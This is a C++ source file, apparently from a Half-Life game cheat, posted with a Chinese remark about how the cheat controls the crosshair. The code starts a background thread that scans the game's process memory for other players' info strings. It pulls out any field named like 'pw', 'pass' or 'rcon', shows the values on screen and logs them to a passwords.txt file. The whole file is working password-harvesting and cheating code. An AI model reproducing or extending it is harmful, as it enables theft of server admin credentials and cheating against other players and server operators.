sniff.cpp

我对他如何控制准星、显示敌友很好奇

#include <windows.h>
#include <vector>
#include <string>
#include <fstream>
using namespace std;
#include "sniff.h"
#include "cvar.h"

#include "timehandling.h"
#include "stringfinder.h"

extern char  gHudMessage[256];
extern StopTimer gHudTimer;


HLSniffer hlSniffer;
//============================================================
//void Dump (void * addr, DWORD length)
//{
//	char filename[256];
//	sprintf(filename,"c:\\tmpaxx\\A%x-L%d.bin",(DWORD)addr,length);
//
//	FILE * fp = fopen (filename, "wb");
//	fwrite ((void*)addr, 1, length, fp);
//        fclose (fp);	
//}

#define MakePtr(cast, ptr, AddValue) (cast)( (DWORD)(ptr)+(DWORD)(AddValue)) 
//=======================================================
void HLSniffer::sniff()
{
	MEMORY_BASIC_INFORMATION MBI;
	void *  pMemory;

	pMemory  = (void *)0x00000000;
	while (VirtualQuery(pMemory, &MBI, sizeof(MBI)))
	{
			if (MBI.State == MEM_COMMIT)
			{
				if(MBI.RegionSize>500000 && MBI.RegionSize<4000000)
				{
					//Dump(pMemory,MBI.RegionSize);
					scan((char*)pMemory,MBI.RegionSize);
				}
			}
		pMemory = MakePtr(void *, pMemory, MBI.RegionSize);
	}
}

////=======================================================
void OGCmessage(const char *fmt, ... );

//=======================================================
void scanCVAR(const string& dump_string, string& out_name, vector<string>& out_cvarnames, vector<string>& out_cvarvalues)
{
	out_name.erase();
	out_cvarnames.clear();
	out_cvarvalues.clear();

	char dump[1024];
	strncpy(dump,dump_string.c_str(),1022);
	dump[1021]=0;

	char* namepos = strstr(dump,"\\name\\");
	if(!namepos) return;
	char* begin   = dump;
	char* end     = dump+strlen(dump);

	char* curpos;
	for(curpos=begin;curpos<end;curpos++) if(*curpos=='\\') *curpos=0;

    // scan backwards:
	curpos = namepos-1;
	for(;;)
	{
		while(curpos>begin && *curpos) --curpos;
		if(curpos<=begin) break; // useless single value
		++curpos;
		string cvar_value ( curpos );
		--curpos; --curpos;

		while(curpos>begin && *curpos) --curpos;
		if(!*curpos) curpos++;
		
		out_cvarnames .push_back (curpos);
		out_cvarvalues.push_back(cvar_value);

		--curpos;--curpos;
		if(curpos<=begin) break;
	}

	// get name:
	curpos = namepos+6;
	
	out_name = curpos;
	out_cvarnames.push_back ("name");
	out_cvarvalues.push_back(out_name);
	
	curpos += out_name.size();
	++curpos;


	// scan forward
	for(;;)
	{
		if(curpos>=end) break;
		string cvar_name = curpos;
		
		while(curpos<end && *curpos) ++curpos;
		++curpos;
		if(curpos>=end) break;

		out_cvarnames .push_back(cvar_name);
		out_cvarvalues.push_back(curpos   );

		while(curpos<end && *curpos) ++curpos;
		++curpos;
	}
}

//=======================================================
bool cvarNameScan(vector<string>& names,vector<string>& values, string* out_name=NULL, string* out_value=NULL)
{
	bool found=false;
	for(unsigned int i=0;i<names.size();i++)
	{
		if(names[i].find("pw"   )!=string::npos) found = true;
		if(names[i].find("pass" )!=string::npos) found = true;
		if(names[i].find("rcon" )!=string::npos) found = true;
		if(found)
		{
			if(out_name)  *out_name  = names[i];
			if(out_value) *out_value = values[i];
			return true;
		}
	}
	return false;
}


string getOgcDirFile(const char* basename);
StringFinder dupecheck;

//=======================================================
void pwScan(const string& cvars)
{
	unsigned int i;
	vector<string> names;
	vector<string> values;
	string nick;
	
	scanCVAR(cvars,nick,names,values);

	string found_value;
	string found_name;
	bool found = cvarNameScan(names,values,&found_name,&found_value);

	if(found)
	{
		bool isdupe = dupecheck.find(nick.c_str());
		if(!isdupe) dupecheck.add(nick.c_str(),0);

		//bool ismyself = true;
		if(cvar.info>=5)OGCmessage("found: %s dupe: %d", nick.c_str(),isdupe);

		// notify
		if(!isdupe || cvar.sniff==2)
		{
			sprintf   (gHudMessage,"%s: %s \"%s\", use \"query\" to find more infos", nick.c_str(), found_name.c_str(), found_value.c_str() );
			gHudTimer.countdown(10);
			OGCmessage("%s: %s \"%s\"", nick.c_str(), found_name.c_str(), found_value.c_str() );
		}

		if(!isdupe)
		{
			// log
			ofstream pwlog( getOgcDirFile("passwords.txt").c_str(), ios::app);

			// init exclude list
			static bool excludeInitialized = false;
			static StringFinder exclude;
			if(!excludeInitialized)
			{
				excludeInitialized=true;
				exclude.add("topcolor",0);
				exclude.add("bottomcolor",0);
				exclude.add("rate",0);
				exclude.add("cl_updaterate",0);
				exclude.add("cl_lw",0);
				exclude.add("cl_lc",0);
				exclude.add("cl_dlmax",0);
				exclude.add("lefthand",0);
				exclude.add("vgui_menus",0);
				exclude.add("model",0);
				exclude.add("ah",0);
				exclude.add("dm",0);
				exclude.add("ghosts",0);
			
			}

			for(i=0;i<names.size();i++)
			{
				if(!exclude.find(names[i].c_str()))
				{
					pwlog<<names[i]<<" = "<<values[i]<<endl;
				}
			}
			pwlog<<"========================================"<<endl;
			pwlog.close();
		}
	}
}


//=======================================================
void HLSniffer::scan(const char* data, int size)
{
	// scan for \\name\\ up to FFFF
	register int   countDown = 0xFFFF;
	register const char* pos = data;

	// do we have the right chunk?
	bool found = false;
	while(countDown){
		if( pos[0]=='\\' && pos[1]=='n' && pos[2]=='a' && pos[3]=='m' && pos[4]=='e' && pos[5]=='\\' ) { found = true; break; }
		++pos;
		--countDown;
	}
	if(!found) return;

	//OGCmessage("Global Cvars found, scanning...");

	// scan
	cvarDump.clear();
	countDown = size-32;
	pos = data;
	while(countDown){
		if( pos[0]=='\\' && pos[1]=='n' && pos[2]=='a' && pos[3]=='m' && pos[4]=='e' && pos[5]=='\\' ) 
		{ 
			const char *begin = pos;
			while(*begin) begin--;
			begin++;
			string cvars( begin );
			cvarDump.push_back(cvars);
		}
		++pos;
		--countDown; 
	}

//	OGCmessage("done. Use \"query\" to view collected information.");

	for(unsigned int i=0;i<cvarDump.size();i++) pwScan(cvarDump[i]);

}


//=======================================================
void HLSniffer::query(const string& indexStr)
{
	if(indexStr.empty())
	{
		for(unsigned int i=0;i<cvarDump.size();i++)
		{
			vector<string> n, v;
			string nick;
			scanCVAR(cvarDump[i],nick,n,v);
			if(cvarNameScan(n,v)) OGCmessage( "&r#  %d [admin] = %s",i,nick.c_str() );
			else                  OGCmessage(   "#  %d = %s",i,nick.c_str() );
		}
		return;
	}
	else
	{
		int unsigned index = atoi(indexStr.c_str());
		if(!( index>=0 && index<cvarDump.size() )){ OGCmessage("&rinvalid number");return; }

		string& dump = cvarDump[index];
		//OGCmessage("%s",dump.c_str());

		vector<string> n,v;
		string nick;
		scanCVAR(dump,nick,n,v);

		for(unsigned int i=0;i<n.size();i++)
		{
			OGCmessage("%s = %s",n[i].c_str(), v[i].c_str());
		}
	}
}
 

//=======================================================
void HLSniffer::mainthread()
{
	while(1)
	{
		try{
			Sleep(10000);

			//void OGCmessage(const char *fmt, ... );

			if(cvar.sniff)
			{
				if(cvar.info==5)OGCmessage("sniffing...");
				sniff();
			}
		}
		catch(...)
		{}
	}
}

//=======================================================
DWORD WINAPI SnifferThread( LPVOID lpParam ) 
{
	HLSniffer* pThis = (HLSniffer*)lpParam;
	pThis->mainthread();
	return 0;
}


//=======================================================
void HLSniffer::createthread()
{
	if(!hThread)
	{
		DWORD dwThreadId;
		hThread = CreateThread(NULL,256*1024,SnifferThread,(LPVOID)this,0,&dwThreadId);
		if(hThread)
		{
			SetThreadPriority(hThread,THREAD_PRIORITY_LOWEST);
		}
	}
}